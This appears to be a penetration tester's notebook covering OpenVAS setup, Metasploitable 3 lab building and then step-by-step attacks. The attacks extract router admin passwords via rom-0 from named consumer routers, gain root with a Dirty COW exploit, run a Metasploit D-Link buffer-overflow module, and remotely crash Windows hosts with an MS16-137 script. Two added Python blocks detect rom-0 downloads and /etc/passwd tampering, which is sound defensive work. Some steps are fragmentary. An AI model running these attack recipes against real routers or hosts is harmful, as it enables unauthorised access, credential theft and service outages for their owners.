Installing OpenVAS

# apt-get install openvas
After this operation, 1,057 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
# apt autoremove
# openvas-setup
When the OpenVAS setup process is finished, the OpenVAS manager, scanner and services are listening on ports 9390, 9391, 9392 and 80. You can use the following netstat command to check whether these services are listening.

Allow the OpenVAS GUI to be accessed from any IP (the units bind to 127.0.0.1 by default; rebinding to 0.0.0.0 exposes the web interface on every interface of the host, so restrict it with a firewall if the host is reachable from untrusted networks)
# cd /lib/systemd/system
# sed -e 's/127.0.0.1/0.0.0.0/g' greenbone-security-assistant.service openvas-manager.service openvas-scanner.service -i
# systemctl daemon-reload
# systemctl restart greenbone-security-assistant.service openvas-manager.service openvas-scanner.service
# ss -nalt

If the ports are not listening, start the services manually:
# openvas-start

Change the OpenVAS admin password
# openvasmd --user=admin --new-password=new_password

Log in to the OpenVAS GUI
If you can't authenticate, openvasmd may not be running:
# openvasmd
To create a new user with the Admin role
# openvasad -c add_user -u your_new_login_here -r Admin
To create a normal user
# openvasmd --create-user NEWUSER
To delete a user
# openvasmd --delete-user=NEWUSER

Creating Metasploitable 3 vm

Download
  1. Packer https://www.packer.io/downloads.html
  2. Vagrant https://releases.hashicorp.com/vagrant/
  3. VirtualBox https://www.virtualbox.org/wiki/Downloads
  4. Metasploitable 3 https://github.com/rapid7/metasploitable3
Install
  1. Vagrant
  2. Virtualbox
Unzip Metasploitable 3
Move packer.exe into the Metasploitable 3 folder
Run PowerShell
> cd C:\Users\user1\Downloads\metasploitable3-master
> .\packer.exe build .\windows_2008_r2.json
You will see windows_2008_r2_virtualbox.box
> vagrant plugin install vagrant-reload
> vagrant box add windows_2008_r2_virtualbox.box --name metasploitable3
> vagrant up
Metasploitable 3 will automatically be imported into VirtualBox and the VM started

To convert the Metasploitable 3 VirtualBox VM to VMware:
open VirtualBox
shut down the Metasploitable 3 VM
click the Metasploitable 3 VM once
click File/Export Appliance
choose metasploitable3 and set Format: OVF 1.0
click Export with the VM name metasploitable3.ova
open VMware
click File/Open
choose metasploitable3.ova
when it asks to Retry, click Retry

List of Metasploitable 3 vulnerabilities

Hacking AirLive, D-Link, Huawei, Pentagram, TP-Link, ZTE, ZynOS, ZyXEL router

This hack won't always succeed. It depends on whether the router has already been patched.
Affected routers:
AirLive WT-2000ARM
D-Link DSL-2640R
Huawei 520 HG
Huawei 530 TRA
Pentagram Cerberus P 6331-42
TP-Link TD-8816
TP-Link TD-W8901G
TP-Link TD-W8951ND
TP-Link TD-W8961ND
ZTE ZXV10 W300
ZynOS
ZyXEL ES-2024
ZyXEL Prestige P-2602HW

Choose a target router and download rom-0
go to http://routeripaddress/rom-0

go to http://www.routerpwn.com/zynos/ and click Choose File
choose rom-0 file location and type Captcha
click Unpack rom-0
you will see something like this. The top line is the password

   98165274
   TP-LINK
   public
   public
   public
   public

Log in to http://routeripaddress/ using
L: admin
P: 98165274
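The whole rom-0 technique above rests on the router serving its configuration backup to an unauthenticated GET for /rom-0. From the defender's side, the same request is easy to spot in the router's (or an upstream proxy's) access log. The script below is an added example, not part of the original notes: it parses Common Log Format lines, reports every request for rom-0 (case-insensitive, query string ignored), distinguishes a router that actually served the file (200 with a body) from one that refused it, and flags sources that fetched rom-0 and later got a 200 on the root page, which is consistent with a login using the recovered password. The log lines and IP addresses are constructed for the example.

```python
import re

# Constructed sample lines in Common Log Format; not taken from the page or any real router.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2017:13:55:36 +0000] "GET /rom-0 HTTP/1.1" 200 16384 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2017:13:57:01 +0000] "GET / HTTP/1.1" 401 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2017:13:58:12 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2017:14:02:09 +0000] "GET /ROM-0?x=1 HTTP/1.1" 404 0 "-" "curl/7.55"
192.0.2.9 - - [10/Oct/2017:14:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_clf(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def is_rom0_path(path):
    # Case-insensitive and tolerant of a trailing slash: "/ROM-0/" still counts.
    return path.rstrip("/").lower() == "/rom-0"


def find_rom0_requests(lines):
    """One finding per request for rom-0; 'served' means the router actually returned the file."""
    findings = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None or not is_rom0_path(rec["path"]):
            continue
        findings.append({
            "src": rec["src"],
            "ts": rec["ts"],
            "status": rec["status"],
            "served": rec["status"] == 200 and rec["size"] > 0,
        })
    return findings


def rom0_exposure_summary(lines):
    """For each source that was served rom-0, note whether a later request for the
    router's root page succeeded. A 200 on / after the download is consistent with a
    login using the recovered password; it is an indicator to investigate, not proof."""
    summary = {}
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        src = rec["src"]
        if is_rom0_path(rec["path"]) and rec["status"] == 200 and rec["size"] > 0:
            summary.setdefault(src, {"first_seen": rec["ts"], "root_200_after": False})
        elif src in summary and rec["path"] == "/" and rec["status"] == 200:
            summary[src]["root_200_after"] = True
    return summary


if __name__ == "__main__":
    for finding in find_rom0_requests(SAMPLE_LOG.splitlines()):
        print(finding)
    print(rom0_exposure_summary(SAMPLE_LOG.splitlines()))
```

A 404 on /rom-0, as for the second source in the sample, is the behaviour of a patched router and is worth keeping as evidence that someone probed it; a 200 with a body means the configuration left the device and the admin password should be treated as known.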

Taking over a target Linux host using dcow

# mv 40847 40847.cpp
# g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

Copy dcow onto the target Linux host.
Log in as a normal user; the root password is changed afterwards.
login as: user1
user1@10.0.10.31's password:
$ bash
user1@ubuntu:~$ chmod 755 dcow
user1@ubuntu:~$ ./dcow -s
Running …
Password overridden to: dirtyCowFun
Received su prompt (Password: )
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak

root@ubuntu:~# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
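The output above shows what the exploit leaves behind on the host: it backs up /etc/passwd to /tmp/.ssh_bak, rewrites the root entry, sets vm.dirty_writeback_centisecs to 0 and then restores the file once it has a root shell. The check below is an added example, not part of the original notes; it assumes (as the backup-and-restore step implies) that the rewritten root line carries a password hash inline instead of the `x` marker that defers to /etc/shadow. It parses /etc/passwd, flags entries whose password field is not a shadow marker, flags any uid-0 account other than root, and compares a fingerprint of the file against a stored baseline so a file-integrity job can catch the rewrite even if it is reverted quickly. The passwd contents and the hash value are constructed for the example.

```python
import hashlib

# Constructed sample /etc/passwd contents; not from the page or any real host.
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user1:x:1000:1000:user1,,,:/home/user1:/bin/bash
"""

# Same file after the root line has been rewritten with an inline hash
# (the hash is a made-up placeholder) and a second uid-0 account has been added.
TAMPERED_PASSWD = """\
root:$6$CONSTRUCTED$notarealhashvalue:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user1:x:1000:1000:user1,,,:/home/user1:/bin/bash
backdoor:x:0:0::/root:/bin/bash
"""

# Values that mean "look in /etc/shadow" or "locked"; anything else is suspicious.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Split passwd text into entries; a line without exactly 7 fields is kept as malformed."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "malformed": False, "name": name, "pw": pw,
                        "uid": uid, "gid": gid, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return (line number, finding, subject) tuples for anything that should not be in /etc/passwd."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], "malformed entry", e["raw"]))
            continue
        if e["pw"] not in SHADOW_MARKERS:
            kind = ("empty password field" if e["pw"] == ""
                    else "inline password hash (bypasses /etc/shadow)")
            findings.append((e["line"], kind, e["name"]))
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["line"], "extra uid-0 account", e["name"]))
    return findings


def fingerprint(text):
    """SHA-256 of the file contents, to be stored as the baseline by a FIM job."""
    return hashlib.sha256(text.encode()).hexdigest()


def changed_since(baseline_fingerprint, text):
    return fingerprint(text) != baseline_fingerprint


if __name__ == "__main__":
    baseline = fingerprint(CLEAN_PASSWD)
    for finding in audit_passwd(TAMPERED_PASSWD):
        print(finding)
    print("changed since baseline:", changed_since(baseline, TAMPERED_PASSWD))
```

On a real host the text would come from reading /etc/passwd; the fingerprint comparison is what matters once the exploit has restored the original file, while the field checks catch the window in which the inline hash is present. The sysctl write shown in the output (/proc/sys/vm/dirty_writeback_centisecs) is a separate indicator that an audit rule on /proc/sys/vm can record.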

D-Link router attack

OPTION1:
L: admin
P: TestingR2

OPTION2:

OPTION3:
This one is run from the LAN
# msfconsole
msf > use exploit/linux/http/dlink_hnap_login_bof
msf exploit(dlink_hnap_login_bof) > show options
Module options (exploit/linux/http/dlink_hnap_login_bof):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   SHELL     /bin/sh          yes       Don't change this
   SHELLARG  sh               yes       Don't change this
   SLEEP     0.5              yes       Seconds to sleep between requests (ARM only)
   SRVHOST   0.0.0.0          yes       IP address for the HTTP server (ARM only)
   SRVPORT   3333             yes       Port for the HTTP server (ARM only)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   VHOST                      no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Dlink DIR-818 / 822 / 823 / 850 [MIPS]
msf exploit(dlink_hnap_login_bof) > set rhost TARGETIP
msf exploit(dlink_hnap_login_bof) > run

LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)

SOURCE:
This attack successfully restarted Windows XP through 10 and Windows Server 2008 R2 through 2012 R2
# wget
# unzip 40744
# python Lsass-remote.py targetip
Target windows will be restarted

SOLUTION: